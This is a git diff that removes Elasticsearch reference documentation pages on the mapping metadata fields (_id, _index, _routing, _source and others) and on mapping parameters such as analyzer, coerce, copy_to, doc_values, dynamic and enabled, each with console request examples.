- -[source,console] --------------------------- -# Example documents -PUT my-index-000001/_doc/1 -{ - "text": "Document with ID 1" -} - -PUT my-index-000001/_doc/2?refresh=true -{ - "text": "Document with ID 2" -} - -GET my-index-000001/_search -{ - "query": { - "terms": { - "_id": [ "1", "2" ] <1> - } - } -} --------------------------- - -<1> Querying on the `_id` field (also see the <>) - -The `_id` field is restricted from use in aggregations, sorting, and scripting. -In case sorting or aggregating on the `_id` field is required, it is advised to -duplicate the content of the `_id` field into another field that has -`doc_values` enabled. - -[NOTE] -================================================== -`_id` is limited to 512 bytes in size and larger values will be rejected. -================================================== diff --git a/docs/reference/mapping/fields/ignored-field.asciidoc b/docs/reference/mapping/fields/ignored-field.asciidoc deleted file mode 100644 index c22e6398892..00000000000 --- a/docs/reference/mapping/fields/ignored-field.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ -[[mapping-ignored-field]] -=== `_ignored` field - -added[6.4.0] - -The `_ignored` field indexes and stores the names of every field in a document -that has been ignored because it was malformed and -<> was turned on. - -This field is searchable with <>, -<> and <> -queries, and is returned as part of the search hits. - -For instance the below query matches all documents that have one or more fields -that got ignored: - -[source,console] --------------------------------------------------- -GET _search -{ - "query": { - "exists": { - "field": "_ignored" - } - } -} --------------------------------------------------- - -Similarly, the below query finds all documents whose `@timestamp` field was -ignored at index time: - -[source,console] --------------------------------------------------- -GET _search -{ - "query": { - "term": { - "_ignored": "@timestamp" - } - } -} --------------------------------------------------- diff --git a/docs/reference/mapping/fields/index-field.asciidoc b/docs/reference/mapping/fields/index-field.asciidoc deleted file mode 100644 index 87e55e992c2..00000000000 --- a/docs/reference/mapping/fields/index-field.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ -[[mapping-index-field]] -=== `_index` field - -When performing queries across multiple indexes, it is sometimes desirable to -add query clauses that are associated with documents of only certain indexes. -The `_index` field allows matching on the index a document was indexed into. -Its value is accessible in certain queries and aggregations, and when sorting -or scripting: - -[source,console] --------------------------- -PUT index_1/_doc/1 -{ - "text": "Document in index 1" -} - -PUT index_2/_doc/2?refresh=true -{ - "text": "Document in index 2" -} - -GET index_1,index_2/_search -{ - "query": { - "terms": { - "_index": ["index_1", "index_2"] <1> - } - }, - "aggs": { - "indices": { - "terms": { - "field": "_index", <2> - "size": 10 - } - } - }, - "sort": [ - { - "_index": { <3> - "order": "asc" - } - } - ], - "script_fields": { - "index_name": { - "script": { - "lang": "painless", - "source": "doc['_index']" <4> - } - } - } -} --------------------------- - -<1> Querying on the `_index` field -<2> Aggregating on the `_index` field -<3> Sorting on the `_index` field -<4> Accessing the `_index` field in scripts - -The `_index` field is exposed virtually -- it is not added to the Lucene index -as a real field. 
This means that you can use the `_index` field in a `term` or -`terms` query (or any query that is rewritten to a `term` query, such as the -`match`, `query_string` or `simple_query_string` query), as well as `prefix` -and `wildcard` queries. However, it does not support `regexp` and `fuzzy` -queries. - -Queries on the `_index` field accept index aliases in addition to concrete -index names. - -NOTE: When specifying a remote index name such as `cluster_1:index_3`, the -query must contain the separator character `:`. For example, a `wildcard` query -on `cluster_*:index_3` would match documents from the remote index. However, a -query on `cluster*index_1` is only matched against local indices, since no -separator is present. This behavior aligns with the usual resolution rules for -remote index names. diff --git a/docs/reference/mapping/fields/meta-field.asciidoc b/docs/reference/mapping/fields/meta-field.asciidoc deleted file mode 100644 index 141a5de7258..00000000000 --- a/docs/reference/mapping/fields/meta-field.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[[mapping-meta-field]] -=== `_meta` field - -A mapping type can have custom meta data associated with it. These are not -used at all by Elasticsearch, but can be used to store application-specific -metadata, such as the class that a document belongs to: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "_meta": { <1> - "class": "MyApp::User", - "version": { - "min": "1.0", - "max": "1.3" - } - } - } -} --------------------------------------------------- - -<1> This `_meta` info can be retrieved with the - <> API. - -The `_meta` field can be updated on an existing type using the -<> API: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_mapping -{ - "_meta": { - "class": "MyApp2::User3", - "version": { - "min": "1.3", - "max": "1.5" - } - } -} --------------------------------------------------- -// TEST[continued] diff --git a/docs/reference/mapping/fields/routing-field.asciidoc b/docs/reference/mapping/fields/routing-field.asciidoc deleted file mode 100644 index 0da9f2469e7..00000000000 --- a/docs/reference/mapping/fields/routing-field.asciidoc +++ /dev/null @@ -1,134 +0,0 @@ -[[mapping-routing-field]] -=== `_routing` field - -A document is routed to a particular shard in an index using the following -formula: - - shard_num = hash(_routing) % num_primary_shards - -The default value used for `_routing` is the document's <>. - -Custom routing patterns can be implemented by specifying a custom `routing` -value per document. For instance: - -[source,console] ------------------------------- -PUT my-index-000001/_doc/1?routing=user1&refresh=true <1> -{ - "title": "This is a document" -} - -GET my-index-000001/_doc/1?routing=user1 <2> ------------------------------- -// TESTSETUP - -<1> This document uses `user1` as its routing value, instead of its ID. -<2> The same `routing` value needs to be provided when - <>, <>, or <> - the document. - -The value of the `_routing` field is accessible in queries: - -[source,console] --------------------------- -GET my-index-000001/_search -{ - "query": { - "terms": { - "_routing": [ "user1" ] <1> - } - } -} --------------------------- - -<1> Querying on the `_routing` field (also see the <>) - -NOTE: Data streams do not support custom routing. Instead, target the -appropriate backing index for the stream. - -==== Searching with custom routing - -Custom routing can reduce the impact of searches. 
Instead of having to fan -out a search request to all the shards in an index, the request can be sent to -just the shard that matches the specific routing value (or values): - -[source,console] ------------------------------- -GET my-index-000001/_search?routing=user1,user2 <1> -{ - "query": { - "match": { - "title": "document" - } - } -} ------------------------------- - -<1> This search request will only be executed on the shards associated with the `user1` and `user2` routing values. - - -==== Making a routing value required - -When using custom routing, it is important to provide the routing value -whenever <>, <>, -<>, or <> a document. - -Forgetting the routing value can lead to a document being indexed on more than -one shard. As a safeguard, the `_routing` field can be configured to make a -custom `routing` value required for all CRUD operations: - -[source,console] ------------------------------- -PUT my-index-000002 -{ - "mappings": { - "_routing": { - "required": true <1> - } - } -} - -PUT my-index-000002/_doc/1 <2> -{ - "text": "No routing value provided" -} ------------------------------- -// TEST[catch:bad_request] - -<1> Routing is required for all documents. -<2> This index request throws a `routing_missing_exception`. - -==== Unique IDs with custom routing - -When indexing documents specifying a custom `_routing`, the uniqueness of the -`_id` is not guaranteed across all of the shards in the index. In fact, -documents with the same `_id` might end up on different shards if indexed with -different `_routing` values. - -It is up to the user to ensure that IDs are unique across the index. - -[[routing-index-partition]] -==== Routing to an index partition - -An index can be configured such that custom routing values will go to a subset of the shards rather -than a single shard. This helps mitigate the risk of ending up with an imbalanced cluster while still -reducing the impact of searches. - -This is done by providing the index level setting <> at index creation. -As the partition size increases, the more evenly distributed the data will become at the -expense of having to search more shards per request. - -When this setting is present, the formula for calculating the shard becomes: - - shard_num = (hash(_routing) + hash(_id) % routing_partition_size) % num_primary_shards - -That is, the `_routing` field is used to calculate a set of shards within the index and then the -`_id` is used to pick a shard within that set. - -To enable this feature, the `index.routing_partition_size` should have a value greater than 1 and -less than `index.number_of_shards`. - -Once enabled, the partitioned index will have the following limitations: - -* Mappings with <> relationships cannot be created within it. -* All mappings within the index must have the `_routing` field marked as required. diff --git a/docs/reference/mapping/fields/source-field.asciidoc b/docs/reference/mapping/fields/source-field.asciidoc deleted file mode 100644 index 43b1fc3b1e4..00000000000 --- a/docs/reference/mapping/fields/source-field.asciidoc +++ /dev/null @@ -1,114 +0,0 @@ -[[mapping-source-field]] -=== `_source` field - -The `_source` field contains the original JSON document body that was passed -at index time. The `_source` field itself is not indexed (and thus is not -searchable), but it is stored so that it can be returned when executing -_fetch_ requests, like <> or <>. 
- -[[disable-source-field]] -==== Disabling the `_source` field - -Though very handy to have around, the source field does incur storage overhead -within the index. For this reason, it can be disabled as follows: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "_source": { - "enabled": false - } - } -} --------------------------------------------------- - -[WARNING] -.Think before disabling the `_source` field -================================================== - -Users often disable the `_source` field without thinking about the -consequences, and then live to regret it. If the `_source` field isn't -available then a number of features are not supported: - -* The <>, <>, -and <> APIs. - -* On the fly <>. - -* The ability to reindex from one Elasticsearch index to another, either - to change mappings or analysis, or to upgrade an index to a new major - version. - -* The ability to debug queries or aggregations by viewing the original - document used at index time. - -* Potentially in the future, the ability to repair index corruption - automatically. -================================================== - -TIP: If disk space is a concern, rather increase the -<> instead of disabling the `_source`. - -[[include-exclude]] -==== Including / Excluding fields from `_source` - -An expert-only feature is the ability to prune the contents of the `_source` -field after the document has been indexed, but before the `_source` field is -stored. - -WARNING: Removing fields from the `_source` has similar downsides to disabling -`_source`, especially the fact that you cannot reindex documents from one -Elasticsearch index to another. Consider using -<> instead. - -The `includes`/`excludes` parameters (which also accept wildcards) can be used -as follows: - -[source,console] --------------------------------------------------- -PUT logs -{ - "mappings": { - "_source": { - "includes": [ - "*.count", - "meta.*" - ], - "excludes": [ - "meta.description", - "meta.other.*" - ] - } - } -} - -PUT logs/_doc/1 -{ - "requests": { - "count": 10, - "foo": "bar" <1> - }, - "meta": { - "name": "Some metric", - "description": "Some metric description", <1> - "other": { - "foo": "one", <1> - "baz": "two" <1> - } - } -} - -GET logs/_search -{ - "query": { - "match": { - "meta.other.foo": "one" <2> - } - } -} --------------------------------------------------- - -<1> These fields will be removed from the stored `_source` field. -<2> We can still search on this field, even though it is not in the stored `_source`. diff --git a/docs/reference/mapping/fields/type-field.asciidoc b/docs/reference/mapping/fields/type-field.asciidoc deleted file mode 100644 index 2b99e2ac1dc..00000000000 --- a/docs/reference/mapping/fields/type-field.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[[mapping-type-field]] -=== `_type` field - -deprecated[6.0.0,See <>] - -Each document indexed is associated with a <> and -an <>. The `_type` field is indexed in order to make -searching by type name fast. 
- -The value of the `_type` field is accessible in queries, aggregations, -scripts, and when sorting: - -[source,console] --------------------------- -# Example documents - -PUT my-index-000001/_doc/1?refresh=true -{ - "text": "Document with type 'doc'" -} - -GET my-index-000001/_search -{ - "query": { - "term": { - "_type": "_doc" <1> - } - }, - "aggs": { - "types": { - "terms": { - "field": "_type", <2> - "size": 10 - } - } - }, - "sort": [ - { - "_type": { <3> - "order": "desc" - } - } - ], - "script_fields": { - "type": { - "script": { - "lang": "painless", - "source": "doc['_type']" <4> - } - } - } -} - --------------------------- - -<1> Querying on the `_type` field -<2> Aggregating on the `_type` field -<3> Sorting on the `_type` field -<4> Accessing the `_type` field in scripts - diff --git a/docs/reference/mapping/params.asciidoc b/docs/reference/mapping/params.asciidoc deleted file mode 100644 index cbf21f55f8d..00000000000 --- a/docs/reference/mapping/params.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[[mapping-params]] -== Mapping parameters - -The following pages provide detailed explanations of the various mapping -parameters that are used by <>: - - -The following mapping parameters are common to some or all field data types: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - - -include::params/analyzer.asciidoc[] - -include::params/boost.asciidoc[] - -include::params/coerce.asciidoc[] - -include::params/copy-to.asciidoc[] - -include::params/doc-values.asciidoc[] - -include::params/dynamic.asciidoc[] - -include::params/eager-global-ordinals.asciidoc[] - -include::params/enabled.asciidoc[] - -include::params/format.asciidoc[] - -include::params/ignore-above.asciidoc[] - -include::params/ignore-malformed.asciidoc[] - -include::params/index.asciidoc[] - -include::params/index-options.asciidoc[] - -include::params/index-phrases.asciidoc[] - -include::params/index-prefixes.asciidoc[] - -include::params/meta.asciidoc[] - -include::params/multi-fields.asciidoc[] - -include::params/normalizer.asciidoc[] - -include::params/norms.asciidoc[] - -include::params/null-value.asciidoc[] - -include::params/position-increment-gap.asciidoc[] - -include::params/properties.asciidoc[] - -include::params/search-analyzer.asciidoc[] - -include::params/similarity.asciidoc[] - -include::params/store.asciidoc[] - -include::params/term-vector.asciidoc[] diff --git a/docs/reference/mapping/params/analyzer.asciidoc b/docs/reference/mapping/params/analyzer.asciidoc deleted file mode 100644 index 4c5d7cda733..00000000000 --- a/docs/reference/mapping/params/analyzer.asciidoc +++ /dev/null @@ -1,107 +0,0 @@ -[[analyzer]] -=== `analyzer` - -[IMPORTANT] -==== -Only <> fields support the `analyzer` mapping parameter. -==== - -The `analyzer` parameter specifies the <> used for -<> when indexing or searching a `text` field. - -Unless overridden with the <> mapping -parameter, this analyzer is used for both <>. See <>. - -[TIP] -==== -We recommend testing analyzers before using them in production. See -<>. -==== - -[[search-quote-analyzer]] -==== `search_quote_analyzer` - -The `search_quote_analyzer` setting allows you to specify an analyzer for phrases, this is particularly useful when dealing with disabling -stop words for phrase queries. - -To disable stop words for phrases a field utilising three analyzer settings will be required: - -1. 
An `analyzer` setting for indexing all terms including stop words -2. A `search_analyzer` setting for non-phrase queries that will remove stop words -3. A `search_quote_analyzer` setting for phrase queries that will not remove stop words - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings":{ - "analysis":{ - "analyzer":{ - "my_analyzer":{ <1> - "type":"custom", - "tokenizer":"standard", - "filter":[ - "lowercase" - ] - }, - "my_stop_analyzer":{ <2> - "type":"custom", - "tokenizer":"standard", - "filter":[ - "lowercase", - "english_stop" - ] - } - }, - "filter":{ - "english_stop":{ - "type":"stop", - "stopwords":"_english_" - } - } - } - }, - "mappings":{ - "properties":{ - "title": { - "type":"text", - "analyzer":"my_analyzer", <3> - "search_analyzer":"my_stop_analyzer", <4> - "search_quote_analyzer":"my_analyzer" <5> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "title":"The Quick Brown Fox" -} - -PUT my-index-000001/_doc/2 -{ - "title":"A Quick Brown Fox" -} - -GET my-index-000001/_search -{ - "query":{ - "query_string":{ - "query":"\"the quick brown fox\"" <6> - } - } -} --------------------------------------------------- - -<1> `my_analyzer` analyzer which tokens all terms including stop words -<2> `my_stop_analyzer` analyzer which removes stop words -<3> `analyzer` setting that points to the `my_analyzer` analyzer which will be used at index time -<4> `search_analyzer` setting that points to the `my_stop_analyzer` and removes stop words for non-phrase queries -<5> `search_quote_analyzer` setting that points to the `my_analyzer` analyzer and ensures that stop words are not removed from phrase queries -<6> Since the query is wrapped in quotes it is detected as a phrase query therefore the `search_quote_analyzer` kicks in and ensures the stop words -are not removed from the query. The `my_analyzer` analyzer will then return the following tokens [`the`, `quick`, `brown`, `fox`] which will match one -of the documents. Meanwhile term queries will be analyzed with the `my_stop_analyzer` analyzer which will filter out stop words. So a search for either -`The quick brown fox` or `A quick brown fox` will return both documents since both documents contain the following tokens [`quick`, `brown`, `fox`]. -Without the `search_quote_analyzer` it would not be possible to do exact matches for phrase queries as the stop words from phrase queries would be -removed resulting in both documents matching. diff --git a/docs/reference/mapping/params/boost.asciidoc b/docs/reference/mapping/params/boost.asciidoc deleted file mode 100644 index 1cfd62d016e..00000000000 --- a/docs/reference/mapping/params/boost.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -[[mapping-boost]] -=== `boost` - -Individual fields can be _boosted_ automatically -- count more towards the relevance score --- at query time, with the `boost` parameter as follows: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "title": { - "type": "text", - "boost": 2 <1> - }, - "content": { - "type": "text" - } - } - } -} --------------------------------------------------- -// TEST[warning:Parameter [boost] on field [title] is deprecated and will be removed in 8.0] - -<1> Matches on the `title` field will have twice the weight as those on the - `content` field, which has the default `boost` of `1.0`. - -NOTE: The boost is applied only for term queries (prefix, range and fuzzy queries are not _boosted_). 
- -You can achieve the same effect by using the boost parameter directly in the query, for instance the following query (with field time boost): - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "match": { - "title": { - "query": "quick brown fox" - } - } - } -} --------------------------------------------------- - -is equivalent to: - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "match": { - "title": { - "query": "quick brown fox", - "boost": 2 - } - } - } -} --------------------------------------------------- - - -deprecated[5.0.0, "Index time boost is deprecated. Instead, the field mapping boost is applied at query time. For indices created before 5.0.0, the boost will still be applied at index time."] -[WARNING] -.Why index time boosting is a bad idea -================================================== - -We advise against using index time boosting for the following reasons: - -* You cannot change index-time `boost` values without reindexing all of your - documents. - -* Every query supports query-time boosting which achieves the same effect. The - difference is that you can tweak the `boost` value without having to reindex. - -* Index-time boosts are stored as part of the <>, which is only one - byte. This reduces the resolution of the field length normalization factor - which can lead to lower quality relevance calculations. - -================================================== diff --git a/docs/reference/mapping/params/coerce.asciidoc b/docs/reference/mapping/params/coerce.asciidoc deleted file mode 100644 index 805dd33bcf4..00000000000 --- a/docs/reference/mapping/params/coerce.asciidoc +++ /dev/null @@ -1,88 +0,0 @@ -[[coerce]] -=== `coerce` - -Data is not always clean. Depending on how it is produced a number might be -rendered in the JSON body as a true JSON number, e.g. `5`, but it might also -be rendered as a string, e.g. `"5"`. Alternatively, a number that should be -an integer might instead be rendered as a floating point, e.g. `5.0`, or even -`"5.0"`. - -Coercion attempts to clean up dirty values to fit the data type of a field. -For instance: - -* Strings will be coerced to numbers. -* Floating points will be truncated for integer values. - -For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "number_one": { - "type": "integer" - }, - "number_two": { - "type": "integer", - "coerce": false - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "number_one": "10" <1> -} - -PUT my-index-000001/_doc/2 -{ - "number_two": "10" <2> -} --------------------------------------------------- -// TEST[catch:bad_request] - -<1> The `number_one` field will contain the integer `10`. -<2> This document will be rejected because coercion is disabled. - -TIP: The `coerce` setting value can be updated on existing fields -using the <>. 
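For example, coercion could later be re-enabled on the `number_two` field from the snippet above with an update mapping request. The following is a minimal sketch rather than an excerpt from the original page:

[source,console]
--------------------------------------------------
PUT my-index-000001/_mapping
{
  "properties": {
    "number_two": {
      "type": "integer",
      "coerce": true
    }
  }
}
--------------------------------------------------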
- -[[coerce-setting]] -==== Index-level default - -The `index.mapping.coerce` setting can be set on the index level to disable -coercion globally across all mapping types: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "index.mapping.coerce": false - }, - "mappings": { - "properties": { - "number_one": { - "type": "integer", - "coerce": true - }, - "number_two": { - "type": "integer" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ "number_one": "10" } <1> - -PUT my-index-000001/_doc/2 -{ "number_two": "10" } <2> --------------------------------------------------- -// TEST[catch:bad_request] - -<1> The `number_one` field overrides the index level setting to enable coercion. -<2> This document will be rejected because the `number_two` field inherits the index-level coercion setting. diff --git a/docs/reference/mapping/params/copy-to.asciidoc b/docs/reference/mapping/params/copy-to.asciidoc deleted file mode 100644 index cc5c811ccf3..00000000000 --- a/docs/reference/mapping/params/copy-to.asciidoc +++ /dev/null @@ -1,70 +0,0 @@ -[[copy-to]] -=== `copy_to` - -The `copy_to` parameter allows you to copy the values of multiple -fields into a group field, which can then be queried as a single -field. - -TIP: If you often search multiple fields, you can improve search speeds by using -`copy_to` to search fewer fields. See <>. - -For example, the `first_name` and `last_name` fields can be copied to -the `full_name` field as follows: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "first_name": { - "type": "text", - "copy_to": "full_name" <1> - }, - "last_name": { - "type": "text", - "copy_to": "full_name" <1> - }, - "full_name": { - "type": "text" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "first_name": "John", - "last_name": "Smith" -} - -GET my-index-000001/_search -{ - "query": { - "match": { - "full_name": { <2> - "query": "John Smith", - "operator": "and" - } - } - } -} - --------------------------------------------------- - -<1> The values of the `first_name` and `last_name` fields are copied to the - `full_name` field. - -<2> The `first_name` and `last_name` fields can still be queried for the - first name and last name respectively, but the `full_name` field can be - queried for both first and last names. - -Some important points: - -* It is the field _value_ which is copied, not the terms (which result from the analysis process). -* The original <> field will not be modified to show the copied values. -* The same value can be copied to multiple fields, with `"copy_to": [ "field_1", "field_2" ]` -* You cannot copy recursively via intermediary fields such as a `copy_to` on -`field_1` to `field_2` and `copy_to` on `field_2` to `field_3` expecting -indexing into `field_1` will eventuate in `field_3`, instead use copy_to -directly to multiple fields from the originating field. \ No newline at end of file diff --git a/docs/reference/mapping/params/doc-values.asciidoc b/docs/reference/mapping/params/doc-values.asciidoc deleted file mode 100644 index e065537daa4..00000000000 --- a/docs/reference/mapping/params/doc-values.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[[doc-values]] -=== `doc_values` - -Most fields are <> by default, which makes them -searchable. The inverted index allows queries to look up the search term in -unique sorted list of terms, and from that immediately have access to the list -of documents that contain the term. 
- -Sorting, aggregations, and access to field values in scripts requires a -different data access pattern. Instead of looking up the term and finding -documents, we need to be able to look up the document and find the terms that -it has in a field. - -Doc values are the on-disk data structure, built at document index time, which -makes this data access pattern possible. They store the same values as the -`_source` but in a column-oriented fashion that is way more efficient for -sorting and aggregations. Doc values are supported on almost all field types, -with the __notable exception of `text` and `annotated_text` fields__. - -All fields which support doc values have them enabled by default. If you are -sure that you don't need to sort or aggregate on a field, or access the field -value from a script, you can disable doc values in order to save disk space: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "status_code": { <1> - "type": "keyword" - }, - "session_id": { <2> - "type": "keyword", - "doc_values": false - } - } - } -} --------------------------------------------------- - -<1> The `status_code` field has `doc_values` enabled by default. -<2> The `session_id` has `doc_values` disabled, but can still be queried. - -NOTE: You cannot disable doc values for <> -fields. diff --git a/docs/reference/mapping/params/dynamic.asciidoc b/docs/reference/mapping/params/dynamic.asciidoc deleted file mode 100644 index 2eddb010d20..00000000000 --- a/docs/reference/mapping/params/dynamic.asciidoc +++ /dev/null @@ -1,87 +0,0 @@ -[[dynamic]] -=== `dynamic` - -By default, fields can be added _dynamically_ to a document, or to -<> within a document, just by indexing a document -containing the new field. For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 <1> -{ - "username": "johnsmith", - "name": { - "first": "John", - "last": "Smith" - } -} - -GET my-index-000001/_mapping <2> - -PUT my-index-000001/_doc/2 <3> -{ - "username": "marywhite", - "email": "mary@white.com", - "name": { - "first": "Mary", - "middle": "Alice", - "last": "White" - } -} - -GET my-index-000001/_mapping <4> --------------------------------------------------- - -<1> This document introduces the string field `username`, the object field - `name`, and two string fields under the `name` object which can be - referred to as `name.first` and `name.last`. -<2> Check the mapping to verify the above. -<3> This document adds two string fields: `email` and `name.middle`. -<4> Check the mapping to verify the changes. - -The details of how new fields are detected and added to the mapping is explained in <>. - -The `dynamic` setting controls whether new fields can be added dynamically or -not. It accepts three settings: - -[horizontal] -`true`:: Newly detected fields are added to the mapping. (default) -`false`:: Newly detected fields are ignored. These fields will not be indexed so will not be searchable - but will still appear in the `_source` field of returned hits. These fields will not be added - to the mapping, new fields must be added explicitly. -`strict`:: If new fields are detected, an exception is thrown and the document is rejected. New fields - must be explicitly added to the mapping. - -The `dynamic` setting may be set at the mapping type level, and on each -<>. Inner objects inherit the setting from their parent -object or from the mapping type. 
For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic": false, <1> - "properties": { - "user": { <2> - "properties": { - "name": { - "type": "text" - }, - "social_networks": { <3> - "dynamic": true, - "properties": {} - } - } - } - } - } -} --------------------------------------------------- - -<1> Dynamic mapping is disabled at the type level, so no new top-level fields will be added dynamically. -<2> The `user` object inherits the type-level setting. -<3> The `user.social_networks` object enables dynamic mapping, so new fields may be added to this inner object. - -TIP: The `dynamic` setting can be updated on existing fields -using the <>. diff --git a/docs/reference/mapping/params/eager-global-ordinals.asciidoc b/docs/reference/mapping/params/eager-global-ordinals.asciidoc deleted file mode 100644 index 76f2f416564..00000000000 --- a/docs/reference/mapping/params/eager-global-ordinals.asciidoc +++ /dev/null @@ -1,116 +0,0 @@ -[[eager-global-ordinals]] -=== `eager_global_ordinals` - -==== What are global ordinals? - -To support aggregations and other operations that require looking up field -values on a per-document basis, Elasticsearch uses a data structure called -<>. Term-based field types such as `keyword` store -their doc values using an ordinal mapping for a more compact representation. -This mapping works by assigning each term an incremental integer or 'ordinal' -based on its lexicographic order. The field's doc values store only the -ordinals for each document instead of the original terms, with a separate -lookup structure to convert between ordinals and terms. - -When used during aggregations, ordinals can greatly improve performance. As an -example, the `terms` aggregation relies only on ordinals to collect documents -into buckets at the shard-level, then converts the ordinals back to their -original term values when combining results across shards. - -Each index segment defines its own ordinal mapping, but aggregations collect -data across an entire shard. So to be able to use ordinals for shard-level -operations like aggregations, Elasticsearch creates a unified mapping called -'global ordinals'. The global ordinal mapping is built on top of segment -ordinals, and works by maintaining a map from global ordinal to the local -ordinal for each segment. - -Global ordinals are used if a search contains any of the following components: - -* Certain bucket aggregations on `keyword`, `ip`, and `flattened` fields. This -includes `terms` aggregations as mentioned above, as well as `composite`, -`diversified_sampler`, and `significant_terms`. -* Bucket aggregations on `text` fields that require <> -to be enabled. -* Operations on parent and child documents from a `join` field, including -`has_child` queries and `parent` aggregations. - -NOTE: The global ordinal mapping uses heap memory as part of the -<>. Aggregations on high cardinality fields -can use a lot of memory and trigger the <>. - -==== Loading global ordinals - -The global ordinal mapping must be built before ordinals can be used during a -search. By default, the mapping is loaded during search on the first time that -global ordinals are needed. 
This is the right approach if you are optimizing
-for indexing speed, but if search performance is a priority, it's recommended
-to load global ordinals eagerly on fields that will be used in
-aggregations:
-
-[source,console]
-------------
-PUT my-index-000001/_mapping
-{
-  "properties": {
-    "tags": {
-      "type": "keyword",
-      "eager_global_ordinals": true
-    }
-  }
-}
-------------
-// TEST[s/^/PUT my-index-000001\n/]
-
-When `eager_global_ordinals` is enabled, global ordinals are built when a shard
-is <> -- Elasticsearch always loads them before
-exposing changes to the content of the index. This shifts the cost of building
-global ordinals from search to index-time. Elasticsearch will also eagerly
-build global ordinals when creating a new copy of a shard, as can occur when
-increasing the number of replicas or relocating a shard onto a new node.
-
-Eager loading can be disabled at any time by updating the `eager_global_ordinals` setting:
-
-[source,console]
-------------
-PUT my-index-000001/_mapping
-{
-  "properties": {
-    "tags": {
-      "type": "keyword",
-      "eager_global_ordinals": false
-    }
-  }
-}
-------------
-// TEST[continued]
-
-IMPORTANT: On a <>, global ordinals are discarded
-after each search and rebuilt when they're requested. This means that
-`eager_global_ordinals` should not be used on frozen indices: it would
-cause global ordinals to be reloaded on every search. Instead, the index should
-be force-merged to a single segment before being frozen. This avoids building
-global ordinals altogether (more details can be found in the next section).
-
-==== Avoiding global ordinal loading
-
-Usually, global ordinals do not present a large overhead in terms of their
-loading time and memory usage. However, loading global ordinals can be
-expensive on indices with large shards, or if the fields contain a large
-number of unique term values. Because global ordinals provide a unified mapping
-for all segments on the shard, they also need to be rebuilt entirely when a new
-segment becomes visible.
-
-In some cases it is possible to avoid global ordinal loading altogether:
-
-* The `terms`, `sampler`, and `significant_terms` aggregations support a
-parameter
-<>
-that helps control how buckets are collected. It defaults to `global_ordinals`,
-but can be set to `map` to instead use the term values directly.
-* If a shard has been <> down to a single
-segment, then its segment ordinals are already 'global' to the shard. In this
-case, Elasticsearch does not need to build a global ordinal mapping and there
-is no additional overhead from using global ordinals. Note that for performance
-reasons you should only force-merge an index to which you will never write
-again.
diff --git a/docs/reference/mapping/params/enabled.asciidoc b/docs/reference/mapping/params/enabled.asciidoc
deleted file mode 100644
index cd8555d952a..00000000000
--- a/docs/reference/mapping/params/enabled.asciidoc
+++ /dev/null
@@ -1,118 +0,0 @@
-[[enabled]]
-=== `enabled`
-
-Elasticsearch tries to index all of the fields you give it, but sometimes you
-want to just store the field without indexing it. For instance, imagine that
-you are using Elasticsearch as a web session store. You may want to index the
-session ID and last update time, but you don't need to query or run
-aggregations on the session data itself.
-
-The `enabled` setting, which can be applied only to the top-level mapping
-definition and to <> fields, causes Elasticsearch to skip
-parsing of the contents of the field entirely.
The JSON can still be retrieved -from the <> field, but it is not searchable or -stored in any other way: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "user_id": { - "type": "keyword" - }, - "last_updated": { - "type": "date" - }, - "session_data": { <1> - "type": "object", - "enabled": false - } - } - } -} - -PUT my-index-000001/_doc/session_1 -{ - "user_id": "kimchy", - "session_data": { <2> - "arbitrary_object": { - "some_array": [ "foo", "bar", { "baz": 2 } ] - } - }, - "last_updated": "2015-12-06T18:20:22" -} - -PUT my-index-000001/_doc/session_2 -{ - "user_id": "jpountz", - "session_data": "none", <3> - "last_updated": "2015-12-06T18:22:13" -} --------------------------------------------------- - -<1> The `session_data` field is disabled. -<2> Any arbitrary data can be passed to the `session_data` field as it will be entirely ignored. -<3> The `session_data` will also ignore values that are not JSON objects. - -The entire mapping may be disabled as well, in which case the document is -stored in the <> field, which means it can be -retrieved, but none of its contents are indexed in any way: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "enabled": false <1> - } -} - -PUT my-index-000001/_doc/session_1 -{ - "user_id": "kimchy", - "session_data": { - "arbitrary_object": { - "some_array": [ "foo", "bar", { "baz": 2 } ] - } - }, - "last_updated": "2015-12-06T18:20:22" -} - -GET my-index-000001/_doc/session_1 <2> - -GET my-index-000001/_mapping <3> --------------------------------------------------- - -<1> The entire mapping is disabled. -<2> The document can be retrieved. -<3> Checking the mapping reveals that no fields have been added. - -The `enabled` setting for existing fields and the top-level mapping -definition cannot be updated. - -Note that because Elasticsearch completely skips parsing the field -contents, it is possible to add non-object data to a disabled field: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "session_data": { - "type": "object", - "enabled": false - } - } - } -} - -PUT my-index-000001/_doc/session_1 -{ - "session_data": "foo bar" <1> -} --------------------------------------------------- - -<1> The document is added successfully, even though `session_data` contains non-object data. \ No newline at end 